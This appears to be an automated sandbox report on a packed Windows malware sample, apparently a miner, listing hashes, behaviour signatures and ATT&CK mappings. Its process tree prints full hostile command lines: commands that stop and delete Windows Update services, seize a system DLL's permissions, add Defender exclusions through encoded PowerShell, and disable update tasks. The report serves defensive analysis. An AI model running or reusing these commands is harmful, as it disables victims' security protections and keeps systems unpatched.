057e1aaca82b095ce425737bb5108155c8717868276e68a9fa93084850d2a585

General

Target

2.exe
Size

7.4MB
MD5

8ddc35d10e70c08abd8a15a787d3b586
SHA1

08219f2e68c5e72a7d218d63cea15bf8db5aff6c
SHA256

057e1aaca82b095ce425737bb5108155c8717868276e68a9fa93084850d2a585
SHA512

99046db0247aebc545daf5e5380a28edec47dffe0b9d036d504bff8616c7c39d2deaa088dac8fe779e497d9b060c76bcb423600426faa70e9ac896de342ed79a
SSDEEP

196608:qs7RTqMym+7SHwnuyFAHqEs4ezo22zS9nln606:T7Y11nu+cso2PlnQ

Score

10^/10

discovery evasion exploit themida trojan

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

2.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2.exe
Drops file in Drivers directory 1 IoCs

Processes:

conhost.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe
Executes dropped EXE 1 IoCs

Processes:

explorer.exe

pid process

4352 explorer.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

4812 takeown.exe
2216 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe

pid	process
4352	explorer.exe

pid	process
4812	takeown.exe
2216	icacls.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

2.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

4812 takeown.exe
2216 icacls.exe

pid	process
4812	takeown.exe
2216	icacls.exe

Themida packer 4 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/4960-132-0x0000000000400000-0x00000000010DC000-memory.dmp	themida
behavioral2/memory/4960-133-0x0000000000400000-0x00000000010DC000-memory.dmp	themida
behavioral2/memory/4960-135-0x0000000000400000-0x00000000010DC000-memory.dmp	themida
behavioral2/memory/4960-136-0x0000000000400000-0x00000000010DC000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

2.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

2.exe

pid process

4960 2.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

conhost.exe

description pid process target process

PID 3452 set thread context of 4352 3452 conhost.exe explorer.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

2356 sc.exe
3120 sc.exe
3036 sc.exe
1088 sc.exe
4640 sc.exe
Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

2840 reg.exe
4004 reg.exe
4168 reg.exe
3092 reg.exe
2432 reg.exe
1296 reg.exe
3580 reg.exe
1868 reg.exe
4604 reg.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	2.exe

pid	process
4960	2.exe

description	pid	process	target process
PID 3452 set thread context of 4352	3452	conhost.exe	explorer.exe

pid	process
2356	sc.exe
3120	sc.exe
3036	sc.exe
1088	sc.exe
4640	sc.exe

pid	process
2840	reg.exe
4004	reg.exe
4168	reg.exe
3092	reg.exe
2432	reg.exe
1296	reg.exe
3580	reg.exe
1868	reg.exe
4604	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeexplorer.exe

pid	process
2024	powershell.exe
2024	powershell.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe
4352	explorer.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

660

pid	process
660

Suspicious use of AdjustPrivilegeToken 12 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	2024	powershell.exe
Token: SeShutdownPrivilege	2384	powercfg.exe
Token: SeCreatePagefilePrivilege	2384	powercfg.exe
Token: SeShutdownPrivilege	3524	powercfg.exe
Token: SeCreatePagefilePrivilege	3524	powercfg.exe
Token: SeShutdownPrivilege	3688	powercfg.exe
Token: SeCreatePagefilePrivilege	3688	powercfg.exe
Token: SeShutdownPrivilege	4436	powercfg.exe
Token: SeCreatePagefilePrivilege	4436	powercfg.exe
Token: SeTakeOwnershipPrivilege	4812	takeown.exe
Token: SeLockMemoryPrivilege	4352	explorer.exe
Token: SeLockMemoryPrivilege	4352	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2.execonhost.execmd.execmd.exe

description	pid	process	target process
PID 4960 wrote to memory of 3452	4960	2.exe	conhost.exe
PID 4960 wrote to memory of 3452	4960	2.exe	conhost.exe
PID 4960 wrote to memory of 3452	4960	2.exe	conhost.exe
PID 3452 wrote to memory of 2024	3452	conhost.exe	powershell.exe
PID 3452 wrote to memory of 2024	3452	conhost.exe	powershell.exe
PID 3452 wrote to memory of 4532	3452	conhost.exe	cmd.exe
PID 3452 wrote to memory of 4532	3452	conhost.exe	cmd.exe
PID 3452 wrote to memory of 2868	3452	conhost.exe	cmd.exe
PID 3452 wrote to memory of 2868	3452	conhost.exe	cmd.exe
PID 4532 wrote to memory of 2356	4532	cmd.exe	sc.exe
PID 4532 wrote to memory of 2356	4532	cmd.exe	sc.exe
PID 2868 wrote to memory of 2384	2868	cmd.exe	powercfg.exe
PID 2868 wrote to memory of 2384	2868	cmd.exe	powercfg.exe
PID 4532 wrote to memory of 3120	4532	cmd.exe	sc.exe
PID 4532 wrote to memory of 3120	4532	cmd.exe	sc.exe
PID 2868 wrote to memory of 3524	2868	cmd.exe	powercfg.exe
PID 2868 wrote to memory of 3524	2868	cmd.exe	powercfg.exe
PID 4532 wrote to memory of 3036	4532	cmd.exe	sc.exe
PID 4532 wrote to memory of 3036	4532	cmd.exe	sc.exe
PID 2868 wrote to memory of 3688	2868	cmd.exe	powercfg.exe
PID 2868 wrote to memory of 3688	2868	cmd.exe	powercfg.exe
PID 4532 wrote to memory of 1088	4532	cmd.exe	sc.exe
PID 4532 wrote to memory of 1088	4532	cmd.exe	sc.exe
PID 2868 wrote to memory of 4436	2868	cmd.exe	powercfg.exe
PID 2868 wrote to memory of 4436	2868	cmd.exe	powercfg.exe
PID 4532 wrote to memory of 4640	4532	cmd.exe	sc.exe
PID 4532 wrote to memory of 4640	4532	cmd.exe	sc.exe
PID 4532 wrote to memory of 3092	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 3092	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 2840	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 2840	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 4004	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 4004	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 2432	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 2432	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 1296	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 1296	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 4812	4532	cmd.exe	takeown.exe
PID 4532 wrote to memory of 4812	4532	cmd.exe	takeown.exe
PID 4532 wrote to memory of 2216	4532	cmd.exe	icacls.exe
PID 4532 wrote to memory of 2216	4532	cmd.exe	icacls.exe
PID 3452 wrote to memory of 4352	3452	conhost.exe	explorer.exe
PID 3452 wrote to memory of 4352	3452	conhost.exe	explorer.exe
PID 3452 wrote to memory of 4352	3452	conhost.exe	explorer.exe
PID 4532 wrote to memory of 3580	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 3580	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 4168	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 4168	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 1868	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 1868	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 4604	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 4604	4532	cmd.exe	reg.exe
PID 4532 wrote to memory of 1136	4532	cmd.exe	schtasks.exe
PID 4532 wrote to memory of 1136	4532	cmd.exe	schtasks.exe
PID 4532 wrote to memory of 4560	4532	cmd.exe	schtasks.exe
PID 4532 wrote to memory of 4560	4532	cmd.exe	schtasks.exe
PID 4532 wrote to memory of 4276	4532	cmd.exe	schtasks.exe
PID 4532 wrote to memory of 4276	4532	cmd.exe	schtasks.exe
PID 4532 wrote to memory of 532	4532	cmd.exe	schtasks.exe
PID 4532 wrote to memory of 532	4532	cmd.exe	schtasks.exe
PID 4532 wrote to memory of 1456	4532	cmd.exe	schtasks.exe
PID 4532 wrote to memory of 1456	4532	cmd.exe	schtasks.exe
PID 4532 wrote to memory of 4756	4532	cmd.exe	schtasks.exe
PID 4532 wrote to memory of 4756	4532	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\2.exe
"C:\Users\Admin\AppData\Local\Temp\2.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:4960

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\2.exe"
2⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3452

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAbwBmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAGsAdgBwAHEAIwA+ACAAQAAoACAAPAAjAHIAdgBhACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwB0AHUAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAdQBjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG8AaQAjAD4A"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2024

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:4532

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:2356

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:3120

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:3036

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:1088

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:4640

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:3092

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:2840

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies security service
- Modifies registry key
PID:4004

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:2432

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:1296

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4812

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2216

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:3580

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:4168

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1868

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:4604

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:1136

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:4560

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:4276

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:532

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:1456

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:4756

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:2264

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of WriteProcessMemory
PID:2868

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2384

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3524

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3688

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4436

C:\Windows\explorer.exe
C:\Windows\explorer.exe aanewtbrhdbz1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/kRRORiyYEXQjlDWVnkLqznS8gWE6k3nXSMLi6nDwXFvazQSyw8+toWHTrnijZtUQ24/815/zhCZs1iAzqCrMGLeWXdJqAzh1OZvKAkAlE5F0/M1ZedWuCT9hZ79EApH/
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4352

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

2

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Virtualization/Sandbox Evasion

1

T1497

Impair Defenses

1

T1562

File Permissions Modification

1

T1222

Credential Access

Discovery

Query Registry

2

T1012

Virtualization/Sandbox Evasion

1

T1497

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

\Users\Admin\AppData\Roaming\2BF.tmp
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/532-174-0x0000000000000000-mapping.dmp

Download
memory/1088-152-0x0000000000000000-mapping.dmp

Download
memory/1136-171-0x0000000000000000-mapping.dmp

Download
memory/1296-160-0x0000000000000000-mapping.dmp

Download
memory/1456-175-0x0000000000000000-mapping.dmp

Download
memory/1868-169-0x0000000000000000-mapping.dmp

Download
memory/2024-142-0x00007FFBC8560000-0x00007FFBC9021000-memory.dmp

Filesize
10.8MB

Download
memory/2024-140-0x0000000000000000-mapping.dmp

Download
memory/2024-141-0x0000018EEA130000-0x0000018EEA152000-memory.dmp

Filesize
136KB

Download
memory/2024-143-0x00007FFBC8560000-0x00007FFBC9021000-memory.dmp

Filesize
10.8MB

Download
memory/2216-162-0x0000000000000000-mapping.dmp

Download
memory/2264-177-0x0000000000000000-mapping.dmp

Download
memory/2356-146-0x0000000000000000-mapping.dmp

Download
memory/2384-147-0x0000000000000000-mapping.dmp

Download
memory/2432-159-0x0000000000000000-mapping.dmp

Download
memory/2840-157-0x0000000000000000-mapping.dmp

Download
memory/2868-145-0x0000000000000000-mapping.dmp

Download
memory/3036-150-0x0000000000000000-mapping.dmp

Download
memory/3092-156-0x0000000000000000-mapping.dmp

Download
memory/3120-148-0x0000000000000000-mapping.dmp

Download
memory/3452-139-0x00007FFBC8560000-0x00007FFBC9021000-memory.dmp

Filesize
10.8MB

Download
memory/3452-155-0x0000019731860000-0x0000019731872000-memory.dmp

Filesize
72KB

Download
memory/3452-138-0x0000019716A40000-0x0000019716E6B000-memory.dmp

Filesize
4.2MB

Download
memory/3452-166-0x00007FFBC8560000-0x00007FFBC9021000-memory.dmp

Filesize
10.8MB

Download
memory/3524-149-0x0000000000000000-mapping.dmp

Download
memory/3580-167-0x0000000000000000-mapping.dmp

Download
memory/3688-151-0x0000000000000000-mapping.dmp

Download
memory/4004-158-0x0000000000000000-mapping.dmp

Download
memory/4168-168-0x0000000000000000-mapping.dmp

Download
memory/4276-173-0x0000000000000000-mapping.dmp

Download
memory/4352-165-0x0000000001FB0000-0x0000000001FD0000-memory.dmp

Filesize
128KB

Download
memory/4352-164-0x00007FF61C2EE514-mapping.dmp

Download
memory/4436-153-0x0000000000000000-mapping.dmp

Download
memory/4532-144-0x0000000000000000-mapping.dmp

Download
memory/4560-172-0x0000000000000000-mapping.dmp

Download
memory/4604-170-0x0000000000000000-mapping.dmp

Download
memory/4640-154-0x0000000000000000-mapping.dmp

Download
memory/4756-176-0x0000000000000000-mapping.dmp

Download
memory/4812-161-0x0000000000000000-mapping.dmp

Download
memory/4960-137-0x00007FFBE72D0000-0x00007FFBE74C5000-memory.dmp

Filesize
2.0MB

Download
memory/4960-132-0x0000000000400000-0x00000000010DC000-memory.dmp

Filesize
12.9MB

Download
memory/4960-136-0x0000000000400000-0x00000000010DC000-memory.dmp

Filesize
12.9MB

Download
memory/4960-135-0x0000000000400000-0x00000000010DC000-memory.dmp

Filesize
12.9MB

Download
memory/4960-134-0x00007FFBE72D0000-0x00007FFBE74C5000-memory.dmp

Filesize
2.0MB

Download
memory/4960-133-0x0000000000400000-0x00000000010DC000-memory.dmp

Filesize
12.9MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads